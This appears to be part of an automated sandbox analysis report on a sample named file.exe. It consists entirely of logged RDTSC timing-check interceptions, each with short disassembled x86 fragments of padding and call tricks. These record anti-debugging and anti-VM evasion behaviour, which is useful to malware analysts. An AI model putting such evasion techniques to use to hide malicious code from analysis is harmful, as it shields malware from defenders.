Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 125E332 second address: 125E346 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F0790D580AEh 0x0000000c jnp 00007F0790D580A6h 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 126394A second address: 126398D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0790D5812Bh 0x00000007 jmp 00007F0790D58136h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 jmp 00007F0790D58137h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11E70FA second address: 11E7140 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0790D580B1h 0x00000009 popad 0x0000000a jnp 00007F0790D580AEh 0x00000010 jmp 00007F0790D580B7h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jg 00007F0790D580A6h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11E7140 second address: 11E7148 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11E7148 second address: 11E7152 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0790D580AEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1266F28 second address: 1266F73 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0790D5813Dh 0x00000008 js 00007F0790D58126h 0x0000000e jmp 00007F0790D58131h 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 jns 00007F0790D5813Ch 0x0000001c jng 00007F0790D5812Ah 0x00000022 push eax 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12218C9 second address: 1209C89 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0790D580A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F0790D580B9h 0x0000000f popad 0x00000010 mov dword ptr [esp], eax 0x00000013 push 00000000h 0x00000015 push edi 0x00000016 call 00007F0790D580A8h 0x0000001b pop edi 0x0000001c mov dword ptr [esp+04h], edi 0x00000020 add dword ptr [esp+04h], 0000001Bh 0x00000028 inc edi 0x00000029 push edi 0x0000002a ret 0x0000002b pop edi 0x0000002c ret 0x0000002d mov di, bx 0x00000030 pushad 0x00000031 call 00007F0790D580B3h 0x00000036 pushad 0x00000037 popad 0x00000038 pop ecx 0x00000039 mov esi, 4F05D8E9h 0x0000003e popad 0x0000003f lea eax, dword ptr [ebp+1248362Ah] 0x00000045 jmp 00007F0790D580B5h 0x0000004a nop 0x0000004b jne 00007F0790D580B5h 0x00000051 push eax 0x00000052 jmp 00007F0790D580B1h 0x00000057 nop 0x00000058 movsx edi, ax 0x0000005b sub dword ptr [ebp+122D334Eh], edx 0x00000061 call dword ptr [ebp+122D30A6h] 0x00000067 push eax 0x00000068 push edx 0x00000069 push eax 0x0000006a push edx 0x0000006b pushad 0x0000006c popad 0x0000006d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1221B5E second address: 1221B63 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 122207E second address: 1222082 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1222082 second address: 12220FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b pushad 0x0000000c jp 00007F0790D5813Ch 0x00000012 jnc 00007F0790D5812Ch 0x00000018 popad 0x00000019 pop eax 0x0000001a push 00000000h 0x0000001c push edi 0x0000001d call 00007F0790D58128h 0x00000022 pop edi 0x00000023 mov dword ptr [esp+04h], edi 0x00000027 add dword ptr [esp+04h], 0000001Ah 0x0000002f inc edi 0x00000030 push edi 0x00000031 ret 0x00000032 pop edi 0x00000033 ret 0x00000034 mov dx, 4FF2h 0x00000038 mov edx, dword ptr [ebp+122D2A23h] 0x0000003e call 00007F0790D58129h 0x00000043 push eax 0x00000044 push edx 0x00000045 jl 00007F0790D58130h 0x0000004b jmp 00007F0790D5812Ah 0x00000050 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 122230C second address: 1222310 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1222566 second address: 1222576 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0790D58126h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1222C0C second address: 1222C10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1222C10 second address: 1222C28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0790D58130h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1222C61 second address: 1222C65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1222C65 second address: 1222C6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1222C6B second address: 1222C71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1222C71 second address: 1222CBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F0790D5812Ch 0x0000000e nop 0x0000000f mov edx, dword ptr [ebp+122D2BABh] 0x00000015 lea eax, dword ptr [ebp+1248366Eh] 0x0000001b push 00000000h 0x0000001d push edi 0x0000001e call 00007F0790D58128h 0x00000023 pop edi 0x00000024 mov dword ptr [esp+04h], edi 0x00000028 add dword ptr [esp+04h], 00000014h 0x00000030 inc edi 0x00000031 push edi 0x00000032 ret 0x00000033 pop edi 0x00000034 ret 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 ja 00007F0790D5812Ch 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1222CBE second address: 1222D3E instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0790D580ACh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d ja 00007F0790D580A7h 0x00000013 lea eax, dword ptr [ebp+1248362Ah] 0x00000019 push 00000000h 0x0000001b push edi 0x0000001c call 00007F0790D580A8h 0x00000021 pop edi 0x00000022 mov dword ptr [esp+04h], edi 0x00000026 add dword ptr [esp+04h], 0000001Dh 0x0000002e inc edi 0x0000002f push edi 0x00000030 ret 0x00000031 pop edi 0x00000032 ret 0x00000033 jp 00007F0790D580A7h 0x00000039 nop 0x0000003a push esi 0x0000003b pushad 0x0000003c jmp 00007F0790D580B1h 0x00000041 jmp 00007F0790D580B4h 0x00000046 popad 0x00000047 pop esi 0x00000048 push eax 0x00000049 push edi 0x0000004a push eax 0x0000004b push edx 0x0000004c je 00007F0790D580A6h 0x00000052 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1222D3E second address: 1222D42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12673BE second address: 12673C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12677C6 second address: 1267807 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jmp 00007F0790D5812Fh 0x0000000e jmp 00007F0790D5812Dh 0x00000013 jl 00007F0790D58126h 0x00000019 popad 0x0000001a push edx 0x0000001b jmp 00007F0790D58133h 0x00000020 pop edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1267807 second address: 126780C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1267A7D second address: 1267A83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1267A83 second address: 1267A8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1267A8E second address: 1267A92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1267C05 second address: 1267C0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1267C0B second address: 1267C0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126DC65 second address: 126DC98 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0790D580B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F0790D580B6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126DC98 second address: 126DC9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126DC9D second address: 126DCD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 jmp 00007F0790D580B0h 0x0000000b jmp 00007F0790D580AAh 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F0790D580B2h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126DCD4 second address: 126DCDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F0790D58126h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126CA0E second address: 126CA2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0790D580B6h 0x00000009 pop ebx 0x0000000a popad 0x0000000b pushad 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126CA2E second address: 126CA47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F0790D58126h 0x0000000a pop edx 0x0000000b push eax 0x0000000c push esi 0x0000000d pop esi 0x0000000e pushad 0x0000000f popad 0x00000010 pop eax 0x00000011 jne 00007F0790D5812Ch 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126CBA8 second address: 126CBAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126CBAC second address: 126CBE0 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0790D58126h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F0790D58135h 0x0000000f pop edx 0x00000010 jns 00007F0790D5813Ch 0x00000016 jmp 00007F0790D5812Ah 0x0000001b push eax 0x0000001c push edx 0x0000001d push edi 0x0000001e pop edi 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126CEC6 second address: 126CECA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126CECA second address: 126CED0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126CED0 second address: 126CEE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0790D580ACh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126CEE0 second address: 126CEEE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126CEEE second address: 126CEF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126CEF2 second address: 126CEF8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126CEF8 second address: 126CF08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0790D580AAh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126D4F4 second address: 126D524 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0790D58134h 0x0000000b pushad 0x0000000c jmp 00007F0790D58131h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126DAB7 second address: 126DAC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F0790D580A6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126DAC1 second address: 126DAE3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0790D58136h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jc 00007F0790D58126h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12710A8 second address: 12710AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12710AC second address: 12710B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12710B0 second address: 12710B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12710B8 second address: 12710BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12710BD second address: 12710CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12710CD second address: 12710D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12710D4 second address: 12710DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12710DA second address: 12710DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12710DE second address: 12710E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1270C92 second address: 1270CCC instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0790D5812Ch 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jl 00007F0790D58126h 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jng 00007F0790D58139h 0x0000001c push ecx 0x0000001d pop ecx 0x0000001e jmp 00007F0790D58131h 0x00000023 push eax 0x00000024 push eax 0x00000025 pop eax 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1270CCC second address: 1270CD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1270E24 second address: 1270E39 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0790D58126h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F0790D5812Bh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1270E39 second address: 1270E3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1270E3F second address: 1270E43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1273543 second address: 1273553 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0790D580ACh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1273553 second address: 1273568 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0790D5812Fh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1279D96 second address: 1279DBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop eax 0x00000007 jc 00007F0790D580BEh 0x0000000d jmp 00007F0790D580B8h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1279DBB second address: 1279DD7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 js 00007F0790D58126h 0x0000000b popad 0x0000000c push esi 0x0000000d pushad 0x0000000e popad 0x0000000f pop esi 0x00000010 pop edx 0x00000011 pop eax 0x00000012 jbe 00007F0790D58140h 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1279DD7 second address: 1279DDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1279DDD second address: 1279DE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1279DE1 second address: 1279DE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127859C second address: 12785B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0790D58136h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12785B6 second address: 12785C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12785C0 second address: 12785CA instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0790D58126h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12785CA second address: 12785D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1278783 second address: 12787C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0790D58137h 0x00000007 jp 00007F0790D58126h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jnc 00007F0790D58128h 0x00000015 jmp 00007F0790D58130h 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12787C0 second address: 12787C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1278949 second address: 127894F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127894F second address: 127895A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F0790D580A6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127895A second address: 127897F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pushad 0x0000000b popad 0x0000000c pop eax 0x0000000d jmp 00007F0790D58138h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127897F second address: 1278984 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1278AD5 second address: 1278ADA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1278ADA second address: 1278AFF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F0790D580B9h 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jnp 00007F0790D580A6h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1278AFF second address: 1278B09 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0790D58126h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1278C64 second address: 1278C6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12790C1 second address: 12790E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0790D58134h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127DE20 second address: 127DE26 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127D0AB second address: 127D0B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127D0B1 second address: 127D0B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127D0B5 second address: 127D0C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a jnp 00007F0790D58126h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127D0C5 second address: 127D0C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127D0C9 second address: 127D0CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127D3A7 second address: 127D3AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127D66F second address: 127D674 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127D98E second address: 127D992 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127D992 second address: 127D9B9 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0790D58126h 0x00000008 jmp 00007F0790D58134h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jno 00007F0790D58126h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
